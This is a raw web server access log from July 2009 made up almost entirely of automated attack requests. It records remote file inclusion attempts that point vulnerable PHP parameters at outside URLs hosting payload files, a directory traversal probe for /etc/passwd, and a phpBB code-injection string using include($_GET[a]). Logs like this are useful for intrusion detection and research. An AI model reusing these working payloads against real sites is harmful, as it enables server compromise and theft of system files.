58.120.227.242 - - [18/Jul/2009:04:19:32 -0400] "GET /logs/access_log.Q109051800/?_zb_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.810"
58.120.227.242 - - [18/Jul/2009:04:19:32 -0400] "GET /?_zb_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.810"
58.120.227.242 - - [18/Jul/2009:04:19:33 -0400] "GET /logs/?_zb_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 9994 "-" "libwww-perl/5.810"
218.208.21.7 - - [18/Jul/2009:04:19:34 -0400] "GET /logs/access_log.Q109051800/errors.php?error=http://defensive.ru/prog/lib/ID.txt??%0D? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
125.245.146.253 - - [18/Jul/2009:04:19:49 -0400] "GET /logs/access_log.Q109070200//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.thebalvenie.com//files/r0x-id.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.65"
83.96.135.55 - - [18/Jul/2009:04:20:03 -0400] "GET /principal.php?conteudo=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
83.96.135.55 - - [18/Jul/2009:04:20:03 -0400] "GET /logs/principal.php?conteudo=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
83.96.135.55 - - [18/Jul/2009:04:20:03 -0400] "GET /logs/access_log.Q109062300/principal.php?conteudo=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
213.149.105.8 - - [18/Jul/2009:04:20:13 -0400] "GET /logs/access_log.Q109062300/principal.php?conteudo=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
58.120.227.242 - - [18/Jul/2009:04:20:35 -0400] "GET /logs/access_log.Q109051300/?_zb_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.810"
206.225.23.4 - - [18/Jul/2009:04:20:36 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://aboutav.com//id1.txt????? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:04:20:36 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://aboutav.com//id1.txt????? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:04:20:36 -0400] "GET /logs/access_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://aboutav.com//id1.txt????? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
203.57.78.8 - - [18/Jul/2009:04:20:42 -0400] "GET /principal.php?conteudo=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
203.57.78.8 - - [18/Jul/2009:04:20:42 -0400] "GET /logs/principal.php?conteudo=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
203.57.78.8 - - [18/Jul/2009:04:20:42 -0400] "GET /logs/access_log.Q109062300%20%20/principal.php?conteudo=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
206.41.121.69 - - [18/Jul/2009:04:20:45 -0400] "GET /logs/access_log.Q109070200//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.thebalvenie.com//files/r0x-id.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
206.41.121.69 - - [18/Jul/2009:04:20:46 -0400] "GET /logs/access_log.Q109070200//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.thebalvenie.com//files/r0x-id.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
203.57.78.8 - - [18/Jul/2009:04:21:11 -0400] "GET /logs/access_log.Q109062300/principal.php?conteudo=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:04:21:33 -0400] "GET /logs/access_log.Q109052400%20%20///vwar/backup/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:04:21:33 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:04:21:33 -0400] "GET ///vwar/backup/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:04:21:38 -0400] "GET ///vwar/backup/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:04:21:38 -0400] "GET /logs/access_log.Q109052400%20%20///vwar/backup/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:04:21:38 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:04:21:46 -0400] "GET /logs/access_log.Q109061700%20%20///vwar/backup/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:04:21:51 -0400] "GET /logs/access_log.Q109061700%20%20///vwar/backup/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:04:21:56 -0400] "GET /logs/access_log.Q109071000//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.aboutav.com//Scripts/id.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
206.225.23.4 - - [18/Jul/2009:04:21:56 -0400] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.aboutav.com//Scripts/id.txt%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
206.225.23.4 - - [18/Jul/2009:04:21:56 -0400] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.aboutav.com//Scripts/id.txt%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
206.225.23.4 - - [18/Jul/2009:04:21:56 -0400] "GET /logs/access_log.Q109052700//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.aboutav.com//Scripts/id.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
206.225.23.4 - - [18/Jul/2009:04:22:00 -0400] "GET /logs/access_log.Q109062400/////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt????? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Jul/2009:04:22:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
206.225.23.4 - - [18/Jul/2009:04:23:30 -0400] "GET /logs/access_log.Q109060700%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://aboutav.com//id1.txt????? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:04:23:30 -0400] "GET ///vwar/backup/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
201.232.54.48 - - [18/Jul/2009:04:23:34 -0400] "GET /logs/access_log.Q109052800/?REX[INCLUDE_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
206.225.23.4 - - [18/Jul/2009:04:23:34 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:04:23:34 -0400] "GET /logs/access_log.Q109052400///vwar/backup/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:04:23:43 -0400] "GET /logs/access_log.Q109061700///vwar/backup/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
70.86.9.234 - - [18/Jul/2009:04:24:29 -0400] "GET /logs/access_log.Q109062900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:04:24:31 -0400] "GET /logs/access_log.Q109062900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:04:24:31 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:04:24:31 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:04:24:32 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:04:24:32 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:04:25:01 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:04:25:02 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
211.189.18.73 - - [18/Jul/2009:04:25:46 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.189.18.73 - - [18/Jul/2009:04:25:46 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.189.18.73 - - [18/Jul/2009:04:25:46 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.189.18.73 - - [18/Jul/2009:04:26:23 -0400] "GET /logs/access_log.Q109062900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
70.86.9.234 - - [18/Jul/2009:04:26:49 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:04:26:49 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:04:26:49 -0400] "GET /logs/access_log.Q109052100//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:04:26:50 -0400] "GET /logs/access_log.Q109052100//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:04:26:50 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:04:26:50 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:04:26:53 -0400] "GET /logs/access_log.Q109061000//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:04:26:55 -0400] "GET /logs/access_log.Q109061000//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
211.189.18.73 - - [18/Jul/2009:04:27:35 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Jul/2009:04:27:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.189.18.73 - - [18/Jul/2009:04:27:39 -0400] "GET /logs/access_log.Q109062900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.189.18.73 - - [18/Jul/2009:04:27:54 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.189.18.73 - - [18/Jul/2009:04:27:54 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.189.18.73 - - [18/Jul/2009:04:27:54 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.189.18.73 - - [18/Jul/2009:04:28:28 -0400] "GET /logs/access_log.Q109062900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
213.149.105.8 - - [18/Jul/2009:04:30:20 -0400] "GET /solpot.html?body=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
213.149.105.8 - - [18/Jul/2009:04:30:20 -0400] "GET /logs/solpot.html?body=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
83.96.135.55 - - [18/Jul/2009:04:31:23 -0400] "GET /solpot.html?body=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
83.96.135.55 - - [18/Jul/2009:04:31:23 -0400] "GET /logs/access_log.Q109060200%20%20/solpot.html?body=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
83.96.135.55 - - [18/Jul/2009:04:31:23 -0400] "GET /logs/solpot.html?body=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
91.142.209.134 - - [18/Jul/2009:04:31:27 -0400] "GET /logs/access_log.Q109052100//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
91.142.209.134 - - [18/Jul/2009:04:31:27 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
91.142.209.134 - - [18/Jul/2009:04:31:27 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
91.142.209.134 - - [18/Jul/2009:04:31:27 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
91.142.209.134 - - [18/Jul/2009:04:31:27 -0400] "GET /logs/error_log.Q109052100//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
91.142.209.134 - - [18/Jul/2009:04:31:27 -0400] "GET /logs/access_log.Q109052100//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
91.142.209.134 - - [18/Jul/2009:04:31:27 -0400] "GET /logs/error_log.Q109052100//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
91.142.209.134 - - [18/Jul/2009:04:31:27 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
211.189.18.73 - - [18/Jul/2009:04:31:50 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.189.18.73 - - [18/Jul/2009:04:32:00 -0400] "GET /logs/access_log.Q109062900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
70.168.96.43 - - [18/Jul/2009:04:32:14 -0400] "GET /logs/solpot.html?body=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
70.168.96.43 - - [18/Jul/2009:04:32:14 -0400] "GET /solpot.html?body=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Jul/2009:04:32:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.189.18.73 - - [18/Jul/2009:04:32:39 -0400] "GET /logs/access_log.Q109062500/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt???? HTTP/1.1" 404 280 "-" "libwww-perl/5.79"
211.189.18.73 - - [18/Jul/2009:04:32:39 -0400] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt???? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
211.189.18.73 - - [18/Jul/2009:04:32:39 -0400] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt???? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
211.189.18.73 - - [18/Jul/2009:04:32:42 -0400] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt???? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
211.189.18.73 - - [18/Jul/2009:04:32:42 -0400] "GET /logs/access_log.Q109062500/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt???? HTTP/1.1" 404 280 "-" "libwww-perl/5.79"
211.189.18.73 - - [18/Jul/2009:04:32:42 -0400] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt???? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
211.189.18.73 - - [18/Jul/2009:04:32:54 -0400] "GET /logs/access_log.Q109063000/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt???? HTTP/1.1" 404 280 "-" "libwww-perl/5.79"
211.189.18.73 - - [18/Jul/2009:04:32:57 -0400] "GET /logs/access_log.Q109063000/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt???? HTTP/1.1" 404 280 "-" "libwww-perl/5.79"
211.189.18.73 - - [18/Jul/2009:04:33:06 -0400] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.itechwon.co.kr//bbs/include/id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
211.189.18.73 - - [18/Jul/2009:04:33:06 -0400] "GET /logs/access_log.Q109063000/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.itechwon.co.kr//bbs/include/id.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
211.189.18.73 - - [18/Jul/2009:04:33:06 -0400] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.itechwon.co.kr//bbs/include/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
74.223.143.131 - - [18/Jul/2009:04:33:13 -0400] "GET //include.php?path[docroot]=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:04:33:13 -0400] "GET /logs/access_log.Q109051800//include.php?path[docroot]=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:04:33:14 -0400] "GET /logs//include.php?path[docroot]=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
82.146.58.26 - - [18/Jul/2009:04:33:17 -0400] "GET /logs/solpot.html?body=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
82.146.58.26 - - [18/Jul/2009:04:33:17 -0400] "GET /solpot.html?body=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:04:33:18 -0400] "GET /logs/access_log.Q109053100//include.php?path[docroot]=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
213.195.69.64 - - [18/Jul/2009:04:33:19 -0400] "GET /logs/error_log.Q109070700//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.thebalvenie.com//files/r0x-id.txt? HTTP/1.1" 404 268 "-" "libwww-perl/5.79"
74.223.143.131 - - [18/Jul/2009:04:33:22 -0400] "GET /logs//include.php?path[docroot]=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:04:33:22 -0400] "GET //include.php?path[docroot]=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
